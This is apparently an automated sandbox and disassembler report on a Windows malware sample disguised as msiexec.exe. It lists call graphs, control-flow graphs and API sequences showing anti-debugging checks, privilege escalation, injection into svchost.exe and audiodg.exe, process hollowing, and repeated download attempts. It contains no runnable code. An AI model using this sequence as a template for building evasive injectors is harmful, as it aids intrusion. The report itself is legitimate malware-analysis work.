IsDebuggerPresent 1142->1143 1144 7ff7179d322e GetCurrentProcess CheckRemoteDebuggerPresent 1143->1144 1145 7ff7179d322a 1143->1145 1144->1145 1145->857 1145->858 1147 7ff7179d3481 1146->1147 1148 7ff7179d428a GetTokenInformation 1146->1148 1157 7ff7179d3ce4 GetModuleFileNameW 1147->1157 1302 7ff7179d3b54 VirtualAlloc 1148->1302 1150 7ff7179d42bb GetTokenInformation 1151 7ff7179d42e8 CloseHandle 1150->1151 1154 7ff7179d4302 AdjustTokenPrivileges CloseHandle 1150->1154 1152 7ff7179d3b24 VirtualFree 1151->1152 1153 7ff7179d42fd 1152->1153 1153->1147 1303 7ff7179d3b24 1154->1303 1158 7ff7179d3d0f PathFindFileNameW wcslen 1157->1158 1159 7ff7179d3dd2 wcsncpy 1157->1159 1160 7ff7179d3d49 1158->1160 1159->1160 1160->862 1162 7ff7179d43d0 GetLastError 1161->1162 1163 7ff7179d351c 1161->1163 1162->1163 1164 7ff7179d43dd CloseHandle 1162->1164 1163->877 1163->878 1164->1163 1306 7ff7179d38c4 1165->1306 1167 7ff7179d32fd 1310 7ff7179d46e4 1167->1310 1169 7ff7179d3315 1170 7ff7179d3357 CreateThread 1169->1170 1323 7ff7179d40c4 1169->1323 1170->884 1175 7ff7179d38c4 10 API calls 1174->1175 1176 7ff7179d328c 1175->1176 1362 7ff7179d44b4 1176->1362 1180 7ff7179d3744 3 API calls 1179->1180 1181 7ff7179d3a9f 1180->1181 1182 7ff7179d38c4 10 API calls 1181->1182 1183 7ff7179d3aa9 GetModuleFileNameW 1182->1183 1184 7ff7179d3aca 1183->1184 1184->887 1186 7ff7179d341d 1185->1186 1186->897 1186->898 1187->914 1188->916 1189->918 1190->920 1191->922 1192->924 1193->926 1194->928 1195->930 1196->932 1197->934 1198->936 1199->938 1200->940 1201->942 1202->944 1203->946 1204->948 1205->950 1206->952 1207->954 1208->956 1209->958 1210->960 1211->962 1212->964 1213->966 1214->968 1215->970 1216->972 1217->974 1218->976 1219->978 1220->980 1221->982 1222->984 1223->986 1224->988 1225->990 1226->992 1227->994 1228->996 1229->998 1230->1000 1231->1002 1232->1004 1233->1006 1234->1008 1235->1010 1236->1012 1237->1014 1238->1016 1239->1018 1240->1020 1241->1022 1242->1024 1243->1026 1244->1028 1245->1030 1246->1032 1247->1034 1248->1036 1249->1038 1250->1040 1251->1042 1252->1044 1253->1046 1254->1048 1255->1050 1256->1052 1257->1054 1258->1056 1259->1058 1260->1060 1261->1062 1262->1064 1263->1066 1264->1068 1265->1070 1266->1072 1267->1074 1268->1076 1269->1078 1270->1080 1271->1082 1272->1084 1273->1086 1274->1088 1275->1090 1276->1092 1277->1094 1278->1096 1279->1098 1280->1100 1281->1102 1282->1104 1283->1106 1284->1108 1285->1110 1286->1112 1287->1114 1288->1116 1289->1118 1290->1120 1291->1122 1292->1124 1293->1126 1294->1128 1295->1130 1296->1132 1297->1134 1298->1136 1299->1138 1300->1140 1301->1142 1302->1150 1304 7ff7179d3b35 VirtualFree 1303->1304 1305 7ff7179d3b48 1303->1305 1304->1305 1305->1147 1338 7ff7179d3744 GetWindowsDirectoryW 1306->1338 1308 7ff7179d38f3 SHGetFolderPathW lstrcatW lstrcatW CreateDirectoryW 1309 7ff7179d395e lstrcatW lstrcatW lstrcatW 1308->1309 1309->1167 1311 7ff7179d4731 1310->1311 1312 7ff7179d4745 GetFileSize GetProcessHeap RtlAllocateHeap 1311->1312 1313 7ff7179d473e 1311->1313 1314 7ff7179d47a0 ReadFile 1312->1314 1315 7ff7179d478e CloseHandle 1312->1315 1313->1169 1316 7ff7179d47ef 1314->1316 1317 7ff7179d47c7 GetProcessHeap HeapFree CloseHandle 1314->1317 1315->1313 1318 7ff7179d4808 GetProcessHeap HeapFree CloseHandle 1316->1318 1320 7ff7179d4830 1316->1320 1317->1313 1318->1313 1319 7ff7179d499b GetProcessHeap HeapFree CloseHandle 1319->1313 1320->1319 1321 7ff7179d48eb GetProcessHeap RtlAllocateHeap 1320->1321 1322 7ff7179d4934 1321->1322 1322->1319 1343 7ff7179d4004 CreateToolhelp32Snapshot 1323->1343 1326 7ff7179d40e4 1327 7ff7179d414b GetCurrentProcess OpenProcessToken 1326->1327 1328 7ff7179d41c2 OpenProcess 1327->1328 1329 7ff7179d4168 LookupPrivilegeValueW 1327->1329 1330 7ff7179d41e4 1328->1330 1331 7ff7179d41ee 1328->1331 1332 7ff7179d4190 AdjustTokenPrivileges 1329->1332 1333 7ff7179d41b7 CloseHandle 1329->1333 1335 7ff7179d4244 CloseHandle 1330->1335 1336 7ff7179d424f 1330->1336 1331->1330 1337 7ff7179d4222 WaitForSingleObject 1331->1337 1350 7ff7179d2cb8 1331->1350 1332->1333 1333->1328 1335->1336 1336->1170 1337->1327 1337->1330 1339 7ff7179d378e 1338->1339 1340 7ff7179d3798 GetVolumeInformationW 1338->1340 1339->1340 1342 7ff7179d3814 1340->1342 1341 7ff7179d387e wsprintfW 1341->1308 1342->1341 1344 7ff7179d403f Process32FirstW 1343->1344 1345 7ff7179d3342 1343->1345 1346 7ff7179d405e wcscmp 1344->1346 1347 7ff7179d4099 CloseHandle 1344->1347 1345->1326 1348 7ff7179d4075 1346->1348 1349 7ff7179d4082 Process32NextW 1346->1349 1347->1345 1348->1347 1349->1346 1349->1347 1351 7ff7179d2d0b 1350->1351 1353 7ff7179d2d4d VirtualAllocEx 1351->1353 1356 7ff7179d2d2b 1351->1356 1358 7ff7179d2a88 1351->1358 1354 7ff7179d2d87 WriteProcessMemory 1353->1354 1353->1356 1355 7ff7179d2dd0 VirtualProtectEx 1354->1355 1354->1356 1355->1356 1357 7ff7179d2e03 CreateRemoteThread 1355->1357 1356->1331 1357->1351 1357->1356 1359 7ff7179d2b01 1358->1359 1360 7ff7179d2c0a StrStrA 1359->1360 1361 7ff7179d2b08 1359->1361 1360->1359 1360->1361 1361->1351 1363 7ff7179d44fd 1362->1363 1364 7ff7179d452b GetLastError 1363->1364 1365 7ff7179d450a 1363->1365 1367 7ff7179d329f CreateThread Sleep 1364->1367 1369 7ff7179d4404 GetFileSize 1365->1369 1367->886 1374 7ff7179d3b54 VirtualAlloc 1369->1374 1371 7ff7179d4430 1372 7ff7179d447a CloseHandle 1371->1372 1373 7ff7179d4444 SetFilePointer ReadFile 1371->1373 1372->1367 1373->1372 1374->1371 1424 7ff7179d2f9c 1425 7ff7179d38c4 10 API calls 1424->1425 1426 7ff7179d2fdb 1425->1426 1427 7ff7179d46e4 16 API calls 1426->1427 1428 7ff7179d2fff 1427->1428 1429 7ff7179d40c4 5 API calls 1428->1429 1430 7ff7179d3022 1429->1430 1431 7ff7179d40e4 13 API calls 1430->1431 1432 7ff7179d3037 GetProcessHeap HeapFree 1431->1432 1445 7ff7179d1cdc 1446 7ff7179d1d06 InternetOpenW 1445->1446 1447 7ff7179d1d33 Sleep 1446->1447 1448 7ff7179d1d40 InternetOpenUrlW 1446->1448 1447->1446 1449 7ff7179d1d77 InternetOpenUrlW 1448->1449 1450 7ff7179d1dc9 HttpQueryInfoA 1448->1450 1449->1450 1453 7ff7179d1dae InternetCloseHandle Sleep 1449->1453 1451 7ff7179d1e1e 1450->1451 1452 7ff7179d1df8 InternetCloseHandle InternetCloseHandle Sleep 1450->1452 1454 7ff7179d1e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1451->1454 1455 7ff7179d1e28 InternetCloseHandle InternetOpenUrlW 1451->1455 1452->1446 1453->1446 1457 7ff7179d1f04 1454->1457 1458 7ff7179d1eea InternetCloseHandle InternetCloseHandle 1454->1458 1455->1454 1456 7ff7179d1e6a InternetCloseHandle Sleep 1455->1456 1456->1446 1460 7ff7179d1f0c InternetReadFile 1457->1460 1461 7ff7179d1f5a InternetCloseHandle InternetCloseHandle 1457->1461 1459 7ff7179d1f83 1458->1459 1460->1457 1460->1461 1461->1459 1462 7ff7179d30dc 1463 7ff7179d30e5 1462->1463 1464 7ff7179d31d1 1463->1464 1466 7ff7179d3c24 RegDeleteKeyW 1463->1466 1467 7ff7179d3e24 9 API calls 1463->1467 1468 7ff7179d31c1 Sleep 1463->1468 1469 7ff7179d45c4 1463->1469 1466->1463 1467->1463 1468->1463 1470 7ff7179d4612 1469->1470 1471 7ff7179d465a 1470->1471 1475 7ff7179d4544 SetFilePointer WriteFile SetEndOfFile 1470->1475 1471->1463 1473 7ff7179d463b CloseHandle 1473->1471 1475->1473 1375 7ff7179d33cc 1378 7ff7179d2048 GetModuleFileNameW 1375->1378 1379 7ff7179d20c9 1378->1379 1386 7ff7179d20c4 1378->1386 1380 7ff7179d211d 1379->1380 1381 7ff7179d2107 1379->1381 1421 7ff7179d1f88 ExpandEnvironmentStringsW 1380->1421 1382 7ff7179d2111 1381->1382 1383 7ff7179d213b 1381->1383 1382->1386 1423 7ff7179d2008 ExpandEnvironmentStringsW 1382->1423 1422 7ff7179d1fc8 ExpandEnvironmentStringsW 1383->1422 1387 7ff7179d2132 1387->1386 1389 7ff7179d218d CreateProcessW 1387->1389 1389->1386 1390 7ff7179d21e8 1389->1390 1390->1386 1391 7ff7179d222f GetFileSize 1390->1391 1392 7ff7179d224d 1391->1392 1393 7ff7179d2257 CloseHandle 1391->1393 1392->1393 1394 7ff7179d2267 VirtualAlloc 1392->1394 1393->1386 1395 7ff7179d22a1 ReadFile 1394->1395 1396 7ff7179d2291 CloseHandle 1394->1396 1397 7ff7179d22f1 CloseHandle GetThreadContext 1395->1397 1398 7ff7179d22ce VirtualFree CloseHandle 1395->1398 1396->1386 1399 7ff7179d2341 VirtualFree 1397->1399 1400 7ff7179d2359 ReadProcessMemory GetModuleHandleA GetProcAddress 1397->1400 1398->1386 1399->1386 1401 7ff7179d23dc 1400->1401 1402 7ff7179d23e0 VirtualFree 1401->1402 1403 7ff7179d23f8 VirtualAllocEx 1401->1403 1402->1386 1404 7ff7179d2463 VirtualFree 1403->1404 1405 7ff7179d247b WriteProcessMemory 1403->1405 1404->1386 1406 7ff7179d24b1 VirtualFree 1405->1406 1408 7ff7179d24c9 1405->1408 1406->1386 1407 7ff7179d24ff WriteProcessMemory 1407->1408 1409 7ff7179d258a VirtualFree 1407->1409 1408->1407 1414 7ff7179d25a7 1408->1414 1409->1386 1410 7ff7179d2898 WriteProcessMemory SetThreadContext 1412 7ff7179d2933 ResumeThread 1410->1412 1413 7ff7179d291e VirtualFree 1410->1413 1411 7ff7179d2619 RtlCompareMemory 1411->1414 1418 7ff7179d266c 1411->1418 1415 7ff7179d2945 VirtualFree 1412->1415 1416 7ff7179d295a VirtualFree 1412->1416 1413->1386 1414->1410 1414->1411 1415->1386 1416->1386 1417 7ff7179d2893 1417->1410 1418->1417 1419 7ff7179d279c ReadProcessMemory WriteProcessMemory 1418->1419 1419->1418 1420 7ff7179d2871 VirtualFree 1419->1420 1420->1386 1421->1387 1422->1387 1423->1387 1436 7ff7179d2f0c CreateMutexA 1437 7ff7179d2f31 ReleaseMutex CloseHandle 1436->1437 1438 7ff7179d2f4e GetLastError 1436->1438 1439 7ff7179d2f90 1437->1439 1440 7ff7179d2f5b ReleaseMutex CloseHandle 1438->1440 1441 7ff7179d2f78 ReleaseMutex CloseHandle 1438->1441 1440->1439 1441->1439 1442 7ff7179d338c 1443 7ff7179d2048 35 API calls 1442->1443 1444 7ff7179d339c 1443->1444 1476 7ff7179d31ec 1477 7ff7179d31f5 1476->1477 1478 7ff7179d320e 1477->1478 1481 7ff7179d306c 1477->1481 1486 7ff7179d2e6c CreateMutexA 1481->1486 1484 7ff7179d30cc Sleep 1484->1477 1485 7ff7179d3087 Sleep CreateThread WaitForSingleObject 1485->1484 1487 7ff7179d2eb5 GetLastError 1486->1487 1488 7ff7179d2e98 ReleaseMutex CloseHandle 1486->1488 1490 7ff7179d2edf ReleaseMutex CloseHandle 1487->1490 1491 7ff7179d2ec2 ReleaseMutex CloseHandle 1487->1491 1489 7ff7179d2ef7 1488->1489 1489->1484 1489->1485 1490->1489 1491->1489

                                                                                                                                                                  Callgraph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                  • Disassembly available
                                                                                                                                                                  callgraph 0 Function_00007FF7179DD0C4 1 Function_00007FF7179D38C4 61 Function_00007FF7179D3744 1->61 2 Function_00007FF7179D40C4 26 Function_00007FF7179D4004 2->26 3 Function_00007FF7179D45C4 62 Function_00007FF7179D4544 3->62 4 Function_00007FF7179DDCC2 5 Function_00007FF7179DDEC1 6 Function_00007FF7179DEBBE 7 Function_00007FF7179DD8B8 8 Function_00007FF7179D2CB8 90 Function_00007FF7179D2A88 8->90 9 Function_00007FF7179DA2D0 10 Function_00007FF7179DC9CB 11 Function_00007FF7179D33CC 72 Function_00007FF7179D2048 11->72 12 Function_00007FF7179D1FC8 13 Function_00007FF7179D43A4 14 Function_00007FF7179D10A0 27 Function_00007FF7179D1000 14->27 69 Function_00007FF7179D1050 14->69 15 Function_00007FF7179D2F9C 15->1 15->2 44 Function_00007FF7179D40E4 15->44 46 Function_00007FF7179D46E4 15->46 93 Function_00007FF7179D3C64 15->93 16 Function_00007FF7179DE99B 17 Function_00007FF7179D359D 18 Function_00007FF7179DE997 19 Function_00007FF7179DE999 20 Function_00007FF7179D39B4 21 Function_00007FF7179D44B4 25 Function_00007FF7179D4404 21->25 22 Function_00007FF7179D33AC 22->72 23 Function_00007FF7179DBEAD 24 Function_00007FF7179DD904 67 Function_00007FF7179D3B54 25->67 28 Function_00007FF7179DC501 29 Function_00007FF7179DABFB 30 Function_00007FF7179D36FC 31 Function_00007FF7179DC2F7 32 Function_00007FF7179DABF7 33 Function_00007FF7179DABF9 34 Function_00007FF7179DC2F9 35 Function_00007FF7179D3F14 36 Function_00007FF7179D3714 37 Function_00007FF7179DD615 38 Function_00007FF7179DD915 39 Function_00007FF7179D2F0C 40 Function_00007FF7179DE008 41 Function_00007FF7179DB508 42 Function_00007FF7179D2008 43 Function_00007FF7179D3609 44->8 45 Function_00007FF7179D3CE4 105 Function_00007FF7179D4674 46->105 47 Function_00007FF7179D1CDC 48 Function_00007FF7179D30DC 48->3 48->20 74 Function_00007FF7179D3C24 48->74 75 Function_00007FF7179D3E24 48->75 80 Function_00007FF7179D3B84 48->80 49 Function_00007FF7179DA0DD 50 Function_00007FF7179DEFD8 51 Function_00007FF7179DB3DA 52 Function_00007FF7179DB2F4 53 Function_00007FF7179DE8F3 54 Function_00007FF7179DC2F5 55 Function_00007FF7179DABF2 56 Function_00007FF7179DBCF1 57 Function_00007FF7179D33EC 58 Function_00007FF7179D32EC 58->1 58->2 58->44 58->46 58->93 59 Function_00007FF7179D31EC 111 Function_00007FF7179D306C 59->111 60 Function_00007FF7179D36EC 61->36 63 Function_00007FF7179DDC46 64 Function_00007FF7179DD33F 65 Function_00007FF7179DD339 66 Function_00007FF7179DCD54 68 Function_00007FF7179DDC55 70 Function_00007FF7179DA052 71 Function_00007FF7179DA04E 72->12 72->42 91 Function_00007FF7179D1F88 72->91 73 Function_00007FF7179D3B24 76 Function_00007FF7179D321C 77 Function_00007FF7179DD91D 78 Function_00007FF7179DC91A 79 Function_00007FF7179DF232 81 Function_00007FF7179DA27F 82 Function_00007FF7179DF281 83 Function_00007FF7179D327C 83->1 83->21 84 Function_00007FF7179DA778 85 Function_00007FF7179DF278 86 Function_00007FF7179D2978 87 Function_00007FF7179DEF92 88 Function_00007FF7179D338C 88->72 89 Function_00007FF7179DA188 90->86 92 Function_00007FF7179D4264 92->67 92->73 94 Function_00007FF7179DCF65 95 Function_00007FF7179DD365 96 Function_00007FF7179DB15F 97 Function_00007FF7179DA061 98 Function_00007FF7179DD361 99 Function_00007FF7179DC65C 100 Function_00007FF7179D345C 100->13 100->14 100->35 100->45 100->57 100->58 100->76 100->83 100->92 104 Function_00007FF7179D3A74 100->104 101 Function_00007FF7179DA258 102 Function_00007FF7179DA05A 103 Function_00007FF7179DDE59 104->1 104->20 104->61 106 Function_00007FF7179DC673 107 Function_00007FF7179DA776 108 Function_00007FF7179DDE70 109 Function_00007FF7179DA772 110 Function_00007FF7179D2E6C 111->110

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 231 7ff7179d345c-7ff7179d3472 call 7ff7179d10a0 call 7ff7179d321c 236 7ff7179d3474-7ff7179d3476 ExitProcess 231->236 237 7ff7179d347c-7ff7179d34aa call 7ff7179d4264 call 7ff7179d3ce4 call 7ff7179d3f14 231->237 244 7ff7179d34fb-7ff7179d350e call 7ff7179d3f14 237->244 245 7ff7179d34ac-7ff7179d34bd call 7ff7179d43a4 237->245 250 7ff7179d3510-7ff7179d3521 call 7ff7179d43a4 244->250 251 7ff7179d354c-7ff7179d355f call 7ff7179d3f14 244->251 252 7ff7179d34bf-7ff7179d34d0 call 7ff7179d43a4 245->252 253 7ff7179d34d2-7ff7179d34d4 ExitProcess 245->253 262 7ff7179d3523-7ff7179d3525 ExitProcess 250->262 263 7ff7179d352b call 7ff7179d327c 250->263 260 7ff7179d3561-7ff7179d3572 call 7ff7179d43a4 251->260 261 7ff7179d35a2-7ff7179d35b8 call 7ff7179d3a74 call 7ff7179d33ec 251->261 252->253 264 7ff7179d34da call 7ff7179d32ec 252->264 276 7ff7179d3574-7ff7179d3576 ExitProcess 260->276 277 7ff7179d357c call 7ff7179d327c 260->277 282 7ff7179d360e-7ff7179d36d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 261->282 283 7ff7179d35ba-7ff7179d35cb call 7ff7179d43a4 261->283 271 7ff7179d3530-7ff7179d3535 263->271 269 7ff7179d34df-7ff7179d34e4 264->269 274 7ff7179d34f3-7ff7179d34f5 ExitProcess 269->274 275 7ff7179d34e6-7ff7179d34f1 Sleep 269->275 278 7ff7179d3544-7ff7179d3546 ExitProcess 271->278 279 7ff7179d3537-7ff7179d3542 Sleep 271->279 275->269 284 7ff7179d3581-7ff7179d3586 277->284 279->271 289 7ff7179d35e0-7ff7179d35e2 ExitProcess 283->289 290 7ff7179d35cd-7ff7179d35de call 7ff7179d43a4 283->290 286 7ff7179d3595-7ff7179d3597 ExitProcess 284->286 287 7ff7179d3588-7ff7179d3593 Sleep 284->287 287->284 290->289 293 7ff7179d35e8 call 7ff7179d32ec 290->293 295 7ff7179d35ed-7ff7179d35f2 293->295 296 7ff7179d35f4-7ff7179d35ff Sleep 295->296 297 7ff7179d3601-7ff7179d3603 ExitProcess 295->297 296->295
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                  • Opcode ID: 8ceee07a51bd93bcdc0c94c1efd1dcbb9b80b1b3d7bb6e6e8f4b7753da0e9892
                                                                                                                                                                  • Instruction ID: 0847cd5fcdc039601dc23e0fd918e4bba807935216bfd3e4d547be9b0ca5a8bb
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ceee07a51bd93bcdc0c94c1efd1dcbb9b80b1b3d7bb6e6e8f4b7753da0e9892
                                                                                                                                                                  • Instruction Fuzzy Hash: 6161FA20A18E9391FB64BB35E9DD2BDE260AF84762FC00135D54E961E7DE6DE40F8630

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                  • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                  • Instruction ID: 023e6c4396f37c2cf9edc83f02147832b6df021c2afed5a9e525a335208004f7
                                                                                                                                                                  • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                  • Instruction Fuzzy Hash: AB31283261CA8286D750EB15E49876EF7A0FBC47A0F901135FA8E43B69DF7CD44A8B10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                  • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                  • Instruction ID: 62877dd75fb5eb1a43bb801d5f7737b99a0ef3b354f43a0726d1ac625d51a796
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 8DF05E24D0CA83C1E7306B65F44C379E790AF45B5AF844174DA8D06596EF6CE50EDB31

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4294037311-0
                                                                                                                                                                  • Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                  • Instruction ID: dbf82d95988f56a7e9bc69d80ff5fc3aa2cce2c80a9ed5ac400ae00080ae8204
                                                                                                                                                                  • Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                  • Instruction Fuzzy Hash: DCF0302590CE83C2EB207B20E5893BDE360FB95754FD00535DD8E42666CF6DD40E9720

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 328 7ff7179d1050-7ff7179d108c LoadLibraryA GetProcAddress
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                  • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                  • Instruction ID: 069b46a2b803c6a3c734011570ca0705d35c50ef87aed3ba200aa6c77e12dc32
                                                                                                                                                                  • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                  • Instruction Fuzzy Hash: D9E09276508F8186C620AB15F88401EB7B4FBC8794F904125EACD42B28DF3CC169CB00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 329 7ff7179d3b24-7ff7179d3b33 330 7ff7179d3b35-7ff7179d3b42 VirtualFree 329->330 331 7ff7179d3b48-7ff7179d3b4c 329->331 330->331
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                  • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                  • Instruction ID: 365907d3356a28463c32b368ace4ff7b8ce05e6755b8cd7f0c21cc2cb67e7c01
                                                                                                                                                                  • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
